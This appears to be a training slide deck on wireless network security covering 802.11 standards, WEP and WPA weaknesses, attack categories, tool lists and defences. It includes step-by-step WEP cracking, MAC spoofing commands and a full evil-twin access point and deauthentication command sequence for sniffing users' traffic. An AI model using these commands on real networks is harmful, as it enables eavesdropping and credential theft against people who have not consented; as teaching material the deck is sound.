WIRELESS SECURITY

BY

C H E TA N S O N I , C D A C - M O H A L I
CYBER SECURITY EXPERT

“ W E A R E E N L I G H T E N M E N T T O S O M E , N I G H T M A R E T O O T H E R S .”
Are you protected from hackers from public Wi-Fi

o 39% of U.S public Wi-Fi users have accessed sensitive

information while using it.
o 66% of U.S adults have used public Wi-Fi.

What potential issues with using public Wi-Fi do people

recognize ?
 88% Identity Theft
 76% Compromised Accounts
 39% Fraudulent Tax Filing
Wireless Technology Statistics
 Types of Wireless Networks

 Extension to a Wired Network

 Multiple Access Points
 LAN to LAN Wireless Networks
 3G/4G Hotspot
 Wireless Networks & Security

1) What are Wireless Networks?

A wireless network is the way that a computer is connected to a
router without a physical link.

2) Why do we need?
Facilitates mobility – You can use lengthy wires instead, but someone
might trip over them.

3) Why security?
Attacker may hack a victim’s personal computer and steal private data
or may perform some illegal activities or crimes using the victim’s
machine and ID.

Also there's a possibility to read wirelessly transferred data

(by using sniffers)
Understanding Wireless Network Standards

Maximum
Standard Frequency rate Modulation method
802.11 2.4 GHz 1 or 2 Mbps FHSS/DSSS
802.11a 5 GHz 54 Mbps OFDM
802.11b 2.4 GHz 11 Mbps DSSS
802.11g 2.4 GHz 54 Mbps OFDM
802.11n 2.4 GHz 600 Mbps OFDM
802.15 2.4 GHz 2 Mbps FHSS
802.16 (WiMAX) 10–66 GHz 120 Mbps OFDM
802.20 (Mobile Wireless Access Working Below 3.5 1 Mbps OFDM
Group) GHz
Bluetooth 2.4 GHz 12 Mbps Gaussian frequency shift keying
(GFSK)
HiperLAN/2 5 GHz 54 Mbps OFDM
 802.11 Overview

 IEEE 802.11 denotes a set of wireless standards

defined by IEEE.

 Most popular includes 802.11a/b/g

 802.11a is in the 5GHz band, b/g is in the 2.4GHz

band

 802.11i is intended to improve security.

 Associating with an AP

 Two initialization methods.

 Shared Key or Open Key.

 With Open Key anyone can talk to the AP.

 Shared Key requires authentication as soon as association

succeeds.
 Security Approaches

Nine security approaches:

1. WEP (Wired Equivalent Privacy)

2. WPA (Wi-Fi Protected Access)
3. WPA2 (Wi-Fi Protected Access, Version 2)
4. RADIUS
5. CCMP
6. TKIP
7. AES
8. 802.11i
9. LEAP

WPA also has two generations named Enterprise and Personal.

 Wired Equivalent Privacy (WEP)

 WEP uses the stream cipher C4.

 RC4 generates a pseudorandom stream of bits (a "keystream") which is
combined with the plaintext using XOR.
 Decryption is performed the same way.

• Encryption:-
– 40 / 64 bits (40+24 = 64)
– 104 / 128 bits (104+24 = 128)
– 232 / 256 bits (232 + 40 = 256)
24 bits are used for IV (Initialization vector).

 To each is added a 24-bit initialization vector

(IV) which is transmitted in the clear.
 WEP

 WEP has several weaknesses.

 The weakness with RC4 is with the Initialization Vector

(IV).

 This lead to several different types of attacks E.g – Caffe

Latte Attack.
 WEP WEAKNESS

 The IV is a 24-bit field is too small and is sent in clear text.

 Associate and Dissociate messages are not authenticated.
 WEP is based on password, and prone to password cracking
attacks.
 Lack of centralized key management makes it difficult to change
the WEP keys with any regularity.
 Wireless adapters from the same vendor may all generate same
IV sequence.
 WEP doesn’t provide cryptographic integrity protection.
 How to break WEP Encryption

1. Start the wireless interface in monitor mode.

2. Test the injection capability of the wireless device to AP.
3. Use a tool such as aireplay-ng to do a fake authentication.
4. Start Wi-Fi sniffing tool such as airodump-ng or cain-abel with
a Bssid filter to collect unique IVs.
5. Start a Wi-Fi packet encryption tool such as aireplay-ng in ARP
request replay mode to inject packets.
6. Run a cracking tool such as cain-abel or aircrack-ng to extract
encryption key from the IVs.
 WPA/WPA2 Personal

WPA is a data encryption method for WLANs based on 802.11

standards.
 Encryption:
 TKIP – Temporal Key Integrity Protocol
 AES – Advanced Encryption Standard

 Pre-Shared Key: (PSK)

 A key of 8-63 characters

 Key Renewal:
 You can choose a Key Renewal period, which instructs the device how
often it should change encryption keys. The default is 3600 seconds.
 How to break WPA/WPA2 Encryption

 WPA – PSK (Bruteforce dictionary Attack)

 De-Authentication Attack.
 Offline Attack (Handshake Attack)
 Brute-force WPA Keys
 Hole in the Mole Attack
 WEP vs. WPA vs. WPA2

Encryption Attributes

Enc Algorithm IV size Enc Key Length Integrity check

Mechanism

WEP RC4 24-bits 40/104-bit CRC-32

WPA RC4, TKIP 48-bits 128-bit Michael and CRC

WPA2 AES-CCMP 48-bits 128-bit CBC-MAC

 What is SSID

 A service set identifier (SSID) is the name used to identify a WLAN, much
the same way a workgroup is used on a Windows network.

 An SSID is configured on the AP as a unique, 1-to 32-character, case-

sensitive alphanumeric name.

 The AP usually beacons (broadcasts) the SSID several times a second so

that users who have WNICs can see a display of all WLANs within range of
the AP’s signal.

 Many vendors have SSIDs set to a default value that companies never
change.

 For example, Cisco APs use the default SSID “tsunami.” shows some
default SSIDs as of this writing, but this list changes often, sometimes
daily.
 Default SSIDs

Vendor Default SSIDs

3Com 3Com, comcomcom, 101
Apple Airport Network
Belkin (54G) Belkin54g
Cisco tsunami
Compaq COMPAQ
D-Link WLAN, default
Dell wireless
Intel Intel, 101, XLAN, 195, Intel Gateway
Linksys linksys, wireless, linksys-g
Microsoft MSHOME
Netgear Wireless, Netgear
SMC WLAN, BRIDGE, SMC
Symantec 101
U.S. Robotics WLAN, USR9106, USR5450, USR8022, USR8054
 Wi-Fi Terminology

WAR WALKING – Attackers walk around with Wi-Fi enabled laptops

to detect open wireless networks.
WAR CHALKING – A method used to draw symbols in public places
to advertise open Wi-Fi networks.
WAR FLYING – In this technique, attackers use drones to detect
open wireless networks.
WAR DRIVING – Attackers drive around with Wi-Fi enabled laptops
to detect open wireless networks.
 Understanding Wardriving

 Detect access points that haven’t been secured.

 Most APs have no passwords or security measures, so wardriving

can be quite rewarding for hackers.

 As of this writing, wardriving isn’t illegal; using the resources of

networks discovered with wardriving is, of course, a different story.

 Wardriving has now been expanded to include warflying, which is

done by using an airplane wired with an antenna and the same
software used in wardriving.
 Understanding Wireless Hacking

 Hacking a wireless network isn’t much different from

hacking a wired LAN.

 Many of the port-scanning and enumeration tools you’ve

learned about can be applied to wireless networks.
 Wireless Threats: Access Control Attacks

Wireless access control attacks aims to penetrate a

network by evading WLAN access control measures.

1. War Driving
2. Rogue Access Points
3. AP Misconfiguration
4. MAC Spoofing
5. Ad-Hoc Associations
6. Unauthorized Associations
7. Client Mis-association
 Wireless Threats: Integrity Attacks

In Integrity Attacks, attackers send forged control, management or

data frames over a wireless network to misdirect the wireless
devices in order to perform another type of attack.

1. Data Frame Injection

2. WEP Injection
3. Data Replay
4. Initialization vector replay attacks
5. Bit-Flipping Attacks
6. Radius Replay
7. Extensible AP Replay
8. Wireless Network Viruses
 Wireless Threats: Confidentiality Attacks

These attacks attempt to intercept confidential information

sent over wireless associations, weather sent in a clear text or
encrypted by Wi-Fi protocols.

1. Eavesdropping
2. Honeypot Access Point
3. Traffic Analysis
4. Cracking WEP key
5. Evil Twin AP
6. Session Hijacking
7. MITM (Man in the Middle Attack)
 Wireless Threats: Availability Attacks

Denial of service attacks aims to prevent legitimate users from accessing

resources in a wireless network.

1. Access point theft

2. Dissociation attacks
3. EAP-Failure
4. Beacon Flood
5. Denial-of-service
6. De-authenticate Flood
7. Routing Attacks
8. Authenticate Flood
9. ARP Cache Poisoning Attack
10. Power Saving attacks
11. TKIP MIC Exploit
 Wireless Threats: Authentication Attacks

The objective of authentication attacks is to steal the identity

of Wi-Fi clients, their personal information, login credentials
etc to gain unauthorized access to network resources.

1. PSK Cracking
2. LEAP Cracking
3. VPN Login Cracking
4. Domain Login Cracking
5. Identity Theft
6. Shared Key Guessing
7. Password Speculation
8. Application Login Theft
 Wireless Hacking Methodology

The objective of the wireless hacking methodology is to

compromise a Wi-Fi network in order to gain
unauthorized access to network resources.
Wi-Fi Discovery

GPS Mapping

Wireless Traffic Analysis

Launch Wireless Attacks

Crack Wi-Fi Encryption

Compromise the Wi-Fi

 Wireless Discovery Tools

 InSSIDer
 NetSurveyor
 Vistumbler
 NetStumbler
 WirelessMon
 Kismet
 Wi-Fi Hopper
 Wavestumbler
 iStumbler
 Wi-Finder
 AirRadar
 Attacking Tools/Packages

• iwconfig – a tool for configuring wireless adapters.

You can use this to ensure that your wireless adapter is in “monitor” mode
which is essential to sending fake ARP (Address Resolution Protocol) requests
to the target router.
• macchanger – a tool that allows you to view and/or spoof (fake) your MAC
address.

• airmon – a tool that can help you set your wireless adapter into monitor
mode (mon0)
• airodump – a tool for capturing packets from a wireless router (otherwise
known as an AP)
• aireplay – a tool for forging ARP requests
• airbase – Used to create fake AP.
• aircrack – a tool for decrypting WEP keys
and many more….
 Aircrack-ng

 As a security professional, your job is to protect a network and make it difficult for
attackers to break in. You might like to believe you can completely prevent
attackers from breaking in, but unfortunately, this goal is impossible.

 Aircrack NG (included on the Backtrack files or available free at www.aircrack-

ng.org) is the tool most hackers use to access WEP-enabled WLANs.

 Aircrack NG replaced AirSnort, a product created by wireless security researchers

Jeremy Bruestle and Blake Hegerle, who set out to prove that WEP encryption
was faulty and easy to crack.

 AirSnort was the first widely used WEP-cracking program and woke up
nonbelievers who thought WEP was enough protection for a WLAN.

 Aircrack NG took up where AirSnort (and the slightly older WEPCrack) left off.
 Defend – when you are using WEP

 Use longer WEP encryption keys, which makes the data analysis task
more difficult.
 If your WLAN equipment supports 128-bit WEP keys.

 Change your WEP keys frequently. There are devices that support
"dynamic WEP" which is off the standard but allows different WEP
keys to be assigned to each user.

 Use a VPN for any protocol, including WEP, that may include sensitive
information.

 Implement a different technique for encrypting traffic, such as IPSec

over wireless.
 To do this, you will probably need to install IPsec software on each wireless client
and use a VLAN to the access points to the IPSec server.
 Defend – when you are using WPA

 Passphrases – the only way to crack WPA is to sniff the password

PMK associated with the handshake authentication process, and
if this password is extremely complicated it will be almost
impossible to crack.

 Passphrase Complexity – select a random passphrase that is not

made up of dictionary words.
 Select a complex passphrase of a minimum of 20 characters in length and
change it at regular intervals.
 Common Defense Techniques

 Change router default user name and password

 Change the internal IP subnet if possible.
 Change default name and hide broadcasting of the SSID (Service
Set Identifier).
 None of the attack methods are faster or effective when a larger
passphrase is used.
 Restrict access to your wireless network by filtering access based
on the MAC (Media Access Code) addresses.
 Use Encryption.
 Protecting your network

 There are several methods to increase the security of a

wireless network.

 Turning off SSID broadcasting.

 SSID broadcasting helps attackers find your WLAN.

 While not broadcasting will not stop anyone, it will make

your network less interesting.
 MAC Address Filtering

 MAC address filtering allows only a set list of hardware

devices connect.

 In theory every device will have a unique MAC address.

 However, using a sniffer the MAC address of a valid client

is easily found.

 Most wireless cards allow their MAC addresses to be

changed.
 Top Wi-Fi Hacking Tools

 Aircrack-ng
 Reaver
 Pixiewps
 Wifite
 Wireshark
 Oclhashcat
 Fern Wifi Cracker
 Wash
 Crunch
 MAC Spoofing Attack

 MAC Spoofing attackers change the MAC address to that

of an authenticated user to bypass the MAC Filtering
configured in an access point.

Commands -
 Ifconfig wlan0 down
 Ifconfig wlan0 hw ether 00:11:22:33:44:55
 Ifconfig wlan0 up

Tools – SMAC (For Windows)

 HTTP/HTTPS - PACKET CAPTURING

 The main objective is to sniff the network and data

layer details over a wireless network to a third party
that would be any user in the present scenario.
_______________________________________________
 This will be achieved by creating a fake access point in a wireless
network. The fake ARP (Address Resolution Protocol) Packets will be
transferred on the same Wi-Fi Network in which users are connected.
This is poisoning the ARP cache using the numerous ARP packets. The
name of the access point is known as ESSID (Extended Service Set
Identification).
_______________________________________________
 The name of the fake access point must be same as the
name of network where original user is connected to get
more efficient output.
Flow Process

================

==============
 Important Terms

 BSSID = Basic service set identification (MAC Address)

 ESSID = Extended Service Set Identification (Wi-Fi Name)
 WEP = Wired Equivalent Privacy
 WPA = Wi-Fi Protected Access
 WAP = Wireless Application protocol
 PSK = Pre-shared key
 AES = Advanced Encryption Standard (802.11i)
 TKIP = Temporal Key Integrity Protocol (802.11i)

CHANNEL = 13 Channels ranging from 2412 to 2472 MHz

 Implementation

REQUIREMENTS –

 Linux Based Operating System (BT-5R3)

 TP-Link USB Adapter
 Aircrack suite
 DHCP Package
 Wireshark Packet Analyzer (For HTTP)
 Ettercap Sniffer (Only for HTTPS)
 SSLSTRIP (Only for HTTPS)
 COMMANDS

 airmon-ng start wlan0

 airodump-ng mon0
 airbase-ng –e “FAKE-AP” mon0
 brctl addbr mitm
 brctl addif mitm eth0
 brctl addif mitm at0
 ifconfig eth0 0.0.0.0 up
 ifconfig at0 0.0.0.0 up
 ifconfig mitm up
 aireplay-ng --deauth 0 –a <BSSID> mon0
 dhclient3 mitm &
 wireshark &
Data Sniffing
 Defenses

 Public key infrastructure – Validation Method

 Stronger mutual authentication with Secret Keys and
Passwords
 Second (secure) channel verification
 Carry-forward verification
 Secure VPN with Mutual Authentication
 ANY QUERY

Mail at chetansoni@cdac.in